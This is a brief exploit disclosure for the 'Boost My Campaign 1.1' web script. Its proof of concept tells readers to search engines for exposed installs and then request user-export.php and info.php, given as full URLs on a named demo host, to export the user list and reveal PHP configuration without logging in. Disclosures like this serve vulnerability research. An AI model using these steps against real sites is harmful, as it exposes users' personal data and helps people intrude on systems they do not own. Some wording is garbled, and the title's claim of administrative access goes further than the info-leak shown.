Boost My Campaign version 1.1 suffers from multiple information disclosure vulnerabilities.
4fddefb7ba57a33d06c1b4a668331210
=======================================================================================================
| # Title : Boost My Campaign 1.1 Unauthenticated Administrative Access Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.1 |
| # Vendor : https://codecanyon.net/item/boost-my-campaign/16753312 |
| # Dork : n/a |
========================================================================================================
poc :
Export users list :
[+] Dorking Adegn Google Or Other Search Enggine
[+] use payload : user-export.php
http://store.webandcrafts.com/demo/campaign/user-export.php
php info :
http://store.webandcrafts.com/demo/campaign/info.php
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================